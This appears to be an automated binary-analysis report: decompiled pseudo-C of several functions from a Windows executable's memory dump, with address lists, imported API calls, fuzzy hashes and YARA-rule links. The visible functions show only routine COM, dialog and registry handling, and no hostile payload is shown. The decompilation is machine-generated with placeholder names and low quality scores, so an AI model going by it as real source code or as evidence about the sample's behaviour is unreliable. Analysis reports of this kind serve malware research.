					E004203D4(_t190, _t246 - 0x5c, _t233, _t240, 1);
					E00401E60( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E0042569C(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

0x0040bbea
0x0040bbee
0x0040bbf5
0x0040bbf8
0x0040bbff
0x0040bc0b
0x0040bc0e
0x0040bc11
0x0040bc17
0x0040bc1d
0x0040bc20
0x0040bc23
0x0040bc26
0x0040bc2e
0x0040bc34
0x0040bc3b
0x0040bc45
0x0040bc4d
0x0040bc55
0x0040bc58
0x0040bc5c
0x0040bc60
0x0040bc63
0x0040bc63
0x0040bc66
0x0040bc6e
0x0040bc78
0x0040bc87
0x0040bc8a
0x0040bc8d
0x0040bc90
0x0040bc96
0x0040bc9e
0x0040bca0
0x0040bca2
0x0040bca6
0x0040bcab
0x0040bcaf
0x0040bcb5
0x0040bcb7
0x0040bcb9
0x0040bcbc
0x0040bcbc
0x0040bcab
0x0040bcbf
0x0040bccc
0x0040bcd9
0x0040bcdc
0x0040bcdf
0x0040bce2
0x0040bce5
0x0040bcf3
0x0040bcf5
0x0040bcf5
0x0040bcf8
0x0040bcfd
0x0040bd00
0x0040bd03
0x0040bd89
0x0040bd89
0x0040bd8c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bd09
0x0040bd09
0x0040bd09
0x0040bd0b
0x0040bd0f
0x0040bd12
0x0040bd16
0x0040bd1c
0x0040bd1f
0x0040bd56
0x0040bd5c
0x0040bd5f
0x0040bd61
0x0040bd65
0x0040bd77
0x0040bd77
0x0040bd67
0x0040bd70
0x0040bd70
0x0040bd79
0x0040bd7d
0x0040bd21
0x0040bd23
0x0040bd26
0x0040bd2b
0x0040bd32
0x0040bd35
0x0040bd3d
0x0040bd42
0x0040bd45
0x0040bd48
0x0040bd4f
0x0040bd4f
0x0040bd80
0x0040bd86
0x00000000
0x0040bd93
0x0040bd93
0x0040bd93
0x0040bd96
0x0040bd9d
0x0040bd9e
0x0040bd9f
0x0040bda9
0x0040bda1
0x0040bda1
0x0040bda1
0x0040bdaf
0x0040bdb1
0x0040bdb2
0x0040bdb8
0x0040bdb9
0x0040bdbc
0x0040bdd0
0x0040bdd4
0x0040bdd7
0x0040bdd9
0x0040bddb
0x0040bdde
0x0040bde7
0x0040bdf0
0x0040be2f
0x0040be43
0x0040be4f
0x0040be62
0x0040be6e
0x0040be7b
0x0040be87
0x0040be87
0x0040bdf0
0x0040be90
0x0040be95
0x0040be95
0x0040be9b
0x0040bea0
0x0040bee8
0x0040bea2
0x0040beaa
0x0040beac
0x0040beac
0x0040beb0
0x0040beb4
0x0040bebf
0x0040bec9
0x0040bed1
0x0040bed2
0x0040bed3
0x0040bee2
0x0040bee2

APIs

__EH_prolog3.LIBCMT ref: 0040BBFF
MapDialogRect.USER32(?,00000000), ref: 0040BC90
SysAllocStringLen.OLEAUT32(?,?), ref: 0040BCAF
CLSIDFromString.OLE32(?,?,00000000), ref: 0040BDA1

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

CLSIDFromProgID.OLE32(?,?,00000000), ref: 0040BDA9
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 0040BE43
SysFreeString.OLEAUT32(00000000), ref: 0040BE95

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 75e4ce61182f7c03f6ee0c6e5374d08c5e63a1d642331971cdebbabc8fdfcec9
Instruction ID: fa3a14ef4653b017ed2668dcd9d64acbdbf55b3be4bfa060d7010d0ccb21a78f
Opcode Fuzzy Hash: 75e4ce61182f7c03f6ee0c6e5374d08c5e63a1d642331971cdebbabc8fdfcec9
Instruction Fuzzy Hash: 76B1F775900209AFDB04DF65D984AEE77B4FF08314F00812AFC19A7391E778E994CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0CC, Relevance: 10.6, APIs: 7, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041F0CC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E004271DA(E0043B113, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E004272B2(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E0040B523(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E004277B0(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E00422542(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E0041EBB5(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E00422522(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x441d44);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x441db4, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}

0x0041f0cc
0x0041f0cc
0x0041f0d3
0x0041f0d8
0x0041f0df
0x0041f0e6
0x0041f0e9
0x0041f0ec
0x0041f252
0x0041f252
0x0041f25d
0x00000000
0x00000000
0x00000000
0x0041f0f2
0x0041f0f2
0x0041f0f8
0x0041f0fb
0x0041f101
0x00000000
0x00000000
0x0041f107
0x0041f10c
0x0041f10f
0x00000000
0x00000000
0x0041f11b
0x0041f11e
0x0041f12e
0x0041f138
0x0041f13f
0x0041f144
0x0041f14b
0x0041f150
0x0041f154
0x0041f158
0x0041f18d
0x0041f18d
0x0041f15a
0x0041f165
0x0041f16e
0x0041f172
0x0041f17b
0x0041f17f
0x0041f185
0x0041f185
0x0041f190
0x0041f196
0x0041f19c
0x0041f19f
0x0041f1a2
0x0041f1a8
0x0041f1ad
0x0041f1b1
0x0041f1b4
0x0041f1b5
0x0041f1ba
0x0041f1bf
0x0041f1c1
0x0041f1d0
0x0041f1e4
0x0041f1e7
0x0041f1ed
0x0041f1f0
0x0041f1fb
0x0041f200
0x0041f200
0x0041f20a
0x0041f20f
0x0041f20f
0x0041f219
0x0041f21e
0x0041f21e
0x0041f224
0x0041f227
0x0041f227
0x0041f1bf
0x0041f22b
0x0041f233
0x0041f239
0x0041f243
0x0041f243
0x0041f249
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0041F0D3
_memset.LIBCMT ref: 0041F13F

Part of subcall function 00422542: _memset.LIBCMT ref: 0042254A

VariantClear.OLEAUT32(?), ref: 0041F17F
SysFreeString.OLEAUT32(00000000), ref: 0041F200
SysFreeString.OLEAUT32(00000000), ref: 0041F20F
SysFreeString.OLEAUT32(00000000), ref: 0041F21E
VariantClear.OLEAUT32(00000000), ref: 0041F233

Part of subcall function 0041EBB5: __EH_prolog3.LIBCMT ref: 0041EBD1
Part of subcall function 0041EBB5: VariantClear.OLEAUT32(?), ref: 0041EC36

Part of subcall function 00422522: VariantCopy.OLEAUT32(?,?), ref: 00422530

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 8ec13566ed1b3366a01422b4a0fd206da0a8edd7b3d5e886eb35b1c28274e312
Instruction ID: 45f7f687c54e46359158663f4887d200d7890bb6172cacd6b8dac8476fac9783
Opcode Fuzzy Hash: 8ec13566ed1b3366a01422b4a0fd206da0a8edd7b3d5e886eb35b1c28274e312
Instruction Fuzzy Hash: AA510871E00209EFDB10CFA4D885BEEBBB4BF08304F14456AE516E7291D779A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00414935, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00414935(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				signed int _t72;
				char* _t89;
				intOrPtr _t92;
				void* _t101;
				char* _t102;
				signed char _t103;
				void* _t110;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				signed int _t129;

				_t115 = __edi;
				_push(0xa4);
				E00427243(E0043A462, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
				_t118 = __ecx;
				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
				E0040C102(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x43ec8c;
				E00402310(__ecx + 0x7c);
				 *((char*)(_t119 - 4)) = 1;
				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
					_t115 = 0x94;
					E004277B0(0x94, _t119 - 0xa4, 0, 0x94);
					_t120 = _t120 + 0xc;
					 *(_t119 - 0xa4) = 0x94;
					GetVersionExA(_t119 - 0xa4);
					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t70 = E00426490(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
				_pop(_t101);
				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
				if(_t70 == 0) {
					_t70 = E00415804(_t101);
				}
				E004277B0(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
				_t72 =  *(_t119 + 8);
				 *(_t118 + 0x78) = _t72;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
				_t102 = _t118 + 0x80;
				 *_t102 = 0;
				_t116 = _t118 + 0xc0;
				 *_t116 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
				_t103 = 0x40;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
				if(( *(_t119 + 0x14) & _t103) != 0) {
					_t92 =  *((intOrPtr*)(_t118 + 0x74));
					_t48 = _t92 + 0x34;
					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
					_t129 =  *_t48;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(E0040E67F(0, _t116, _t118, _t129) + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E00421EB8;
				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
					E00414516(_t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
					_t116 = _t118 + 0x7c;
					E00402030(_t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
					_t88 = E00401D50(_t118 + 0x7c, 0);
					while(1) {
						_t89 = E00429260(_t88, 0x7c);
						if(_t89 == 0) {
							break;
						}
						 *_t89 = 0;
						_t88 = _t89 + 1;
						__eflags = _t89 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
				}
				return E004272C6(0, _t116, _t118);
			}

0x00414935
0x00414935
0x0041493f
0x00414947
0x00414950
0x0041495a
0x0041495f
0x00414965
0x0041496d
0x00414970
0x00414976
0x0041497e
0x00414982
0x00414984
0x00414992
0x00414997
0x004149a1
0x004149a7
0x004149b4
0x004149c6
0x004149c6
0x004149b6
0x004149bd
0x004149c4
0x00000000
0x00000000
0x004149c4
0x004149b4
0x004149d0
0x004149d7
0x004149d8
0x004149db
0x004149dd
0x004149dd
0x004149e7
0x004149ec
0x004149f2
0x004149fa
0x00414a01
0x00414a07
0x00414a0d
0x00414a13
0x00414a15
0x00414a1b
0x00414a1d
0x00414a25
0x00414a2b
0x00414a35
0x00414a3e
0x00414a46
0x00414a47
0x00414a53
0x00414a59
0x00414a5b
0x00414a5e
0x00414a5e
0x00414a5e
0x00414a5e
0x00414a76
0x00414a7c
0x00414a83
0x00414a93
0x00414a98
0x00414aa1
0x00414aa9
0x00414aae
0x00414ab6
0x00414ac0
0x00414ac3
0x00414acc
0x00000000
0x00000000
0x00414abd
0x00414abf
0x00414abf
0x00414abf
0x00414ad4
0x00414ad4
0x00414ade

APIs

__EH_prolog3_GS.LIBCMT ref: 0041493F

Part of subcall function 0040C102: _memset.LIBCMT ref: 0040C119

_memset.LIBCMT ref: 00414992
GetVersionExA.KERNEL32(?), ref: 004149A7
_malloc.LIBCMT ref: 004149D0
_memset.LIBCMT ref: 004149E7

Strings

L, xrefs: 004149C6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$H_prolog3_Version_malloc
String ID: L
API String ID: 1339555267-2909332022
Opcode ID: 39172b4297b7236eeb44183646343e2e8ea03628b1dfb4bf8f10ce0ffe30817a
Instruction ID: e205e8ae423d24fd0487dcf17ae961cf056f98499406a33800e433e093a986be
Opcode Fuzzy Hash: 39172b4297b7236eeb44183646343e2e8ea03628b1dfb4bf8f10ce0ffe30817a
Instruction Fuzzy Hash: E1518EB0A40744CFDB21DF29C980A9ABBE0BF48304F01469EE99997361C778E940CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE2C, Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041BE2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t59;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				intOrPtr* _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E004271DA(E0043ACD4, __ebx, __edi, __esi);
				_t97 =  *((intOrPtr*)(_t101 + 8)) + 0xffffff28;
				E0040E6CB(_t101 - 0x18, _t103,  *((intOrPtr*)( *((intOrPtr*)(_t101 + 8)) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *((intOrPtr*)(_t101 - 0x14));
					if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E0040DF8F();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E004272B2(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *((intOrPtr*)(_t101 + 0xc));
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *((intOrPtr*)(_t101 + 0xc))) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *((intOrPtr*)(_t97 + 0x50));
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *((intOrPtr*)(_t101 + 8)) = 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x441d44, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E004277B0(_t97, _t101 - 0x48, 0, 0x20);
						E004277B0(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *((intOrPtr*)(_t101 + 8));
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *((intOrPtr*)(_t101 + 0xc)), 0x441db4, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *((intOrPtr*)(_t101 - 0x44));
						_t82 = __imp__#6;
						 *((intOrPtr*)(_t101 + 0xc)) = _t70;
						if( *((intOrPtr*)(_t101 - 0x44)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x44)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x40));
						if( *((intOrPtr*)(_t101 - 0x40)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x40)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x3c));
						if( *((intOrPtr*)(_t101 - 0x3c)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x3c)));
						}
						_t71 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *((intOrPtr*)(_t101 + 0xc));
						if( *((intOrPtr*)(_t101 + 0xc)) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E00415838(_t85);
					goto L9;
				}
				 *((intOrPtr*)(_t101 - 0x68)) =  *((intOrPtr*)(_t101 + 0xc));
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E00419B69(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E0040DF8F();
				}
				_t59 = _t98;
				goto L22;
			}

0x0041be2c
0x0041be2c
0x0041be33
0x0041be41
0x0041be4a
0x0041be57
0x0041be5a
0x0041bf81
0x0041bf81
0x0041bf85
0x0041bf88
0x0041bf8a
0x0041bf8d
0x0041bf8e
0x0041bf8e
0x0041bf93
0x0041bf93
0x0041bf95
0x0041bf9a
0x0041bf9a
0x0041be66
0x0041beb3
0x0041beb6
0x0041bebc
0x00000000
0x00000000
0x0041bec2
0x0041bec9
0x0041becf
0x0041bed4
0x0041bed6
0x0041bed9
0x0041bede
0x0041bee5
0x0041bef1
0x0041bef3
0x0041bef5
0x00000000
0x00000000
0x0041bf02
0x0041bf0e
0x0041bf13
0x0041bf18
0x0041bf1b
0x0041bf1d
0x0041bf22
0x00000000
0x00000000
0x0041bf3f
0x0041bf42
0x0041bf45
0x0041bf4b
0x0041bf4e
0x0041bf53
0x0041bf53
0x0041bf55
0x0041bf58
0x0041bf5d
0x0041bf5d
0x0041bf5f
0x0041bf62
0x0041bf67
0x0041bf67
0x0041bf69
0x0041bf6f
0x0041bf72
0x0041bf75
0x0041bf77
0x0041bf77
0x00000000
0x0041bf75
0x0041bee0
0x0041bee0
0x00000000
0x0041bee0
0x0041be6b
0x0041be74
0x0041be7b
0x0041be7e
0x0041be81
0x0041be84
0x0041be87
0x0041be8a
0x0041be8d
0x0041be95
0x00000000
0x00000000
0x0041be97
0x0041be9e
0x0041bea1
0x0041bea3
0x0041bea6
0x0041bea7
0x0041bea7
0x0041beac
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0041BE33
VariantClear.OLEAUT32(?), ref: 0041BEC9
_memset.LIBCMT ref: 0041BF02
_memset.LIBCMT ref: 0041BF0E
SysFreeString.OLEAUT32(?), ref: 0041BF53
SysFreeString.OLEAUT32(?), ref: 0041BF5D
SysFreeString.OLEAUT32(?), ref: 0041BF67

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 13a0d851b816542f41455e046981a0cea57a43449bb26d0c438d6a48d8f6c46d
Instruction ID: 71aceca4d7b1fc29c1e095b9e1f0a7388e71ecb59a13ac91c01afb7a8988f0dc
Opcode Fuzzy Hash: 13a0d851b816542f41455e046981a0cea57a43449bb26d0c438d6a48d8f6c46d
Instruction Fuzzy Hash: 8B411871E00229EFCB11DFA1C845ADEBB79FF08B14F10851AF515AA290C7789A91CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D902, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040D902(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				signed int _t39;
				char _t43;
				void* _t46;
				void* _t53;
				char* _t60;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t77;
				intOrPtr* _t78;
				void* _t94;
				intOrPtr* _t96;
				void* _t97;
				char* _t100;

				_t91 = __edx;
				_t78 = __ecx;
				_t76 = __ebx;
				_t100 =  &_v272;
				_t39 =  *0x44f5d0; // 0x765b253d
				_a264 = _t39 ^ _t100;
				_push(0x18);
				E004271DA(E00439B9D, __ebx, __edi, __esi);
				_t96 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t43 = E0040D6FF(__ecx, __edx);
				_v28 = _t43;
				if(_t43 != 0) {
					do {
						_t74 =  &_v28;
						_push(_t74);
						_t78 = _t96;
						E0040D710();
						if(_t74 != 0) {
							_t91 =  *_t74;
							_t78 = _t74;
							 *((intOrPtr*)( *_t74 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while (_v28 != 0);
				}
				if( *((intOrPtr*)(_t96 + 0x54)) == 0) {
					L12:
					 *[fs:0x0] = _v12;
					_pop(_t94);
					_pop(_t97);
					_pop(_t77);
					_t46 = E0042569C(1, _t77, _a264 ^ _t100, _t91, _t94, _t97);
					__eflags =  &_a268;
					return _t46;
				} else {
					if((0 |  *((intOrPtr*)(_t96 + 0x68)) != 0x00000000) != 0) {
						E00401EE0(_t76, _t100, "Software\\");
						_v4 = 0;
						E00401C10(0,  *((intOrPtr*)(_t96 + 0x54)));
						_push("\\");
						_push( &_v16);
						_push( &_v36);
						_t53 = E0040D78F(_t76, 0, _t96, __eflags);
						_push( *((intOrPtr*)(_t96 + 0x68)));
						_v4 = 1;
						_push(_t53);
						_push( &_v24);
						E0040D78F(_t76, 0, _t96, __eflags);
						_v4 = 3;
						E00401E60(_v36 + 0xfffffff0, _t91);
						_push( &_v24);
						_push(0x80000001);
						E0040D7F3(_t76, 0, 0x80000001, __eflags);
						_t60 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t60;
						if(_t60 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t100, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E0040D7F3(_t76, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t100,  &_v32);
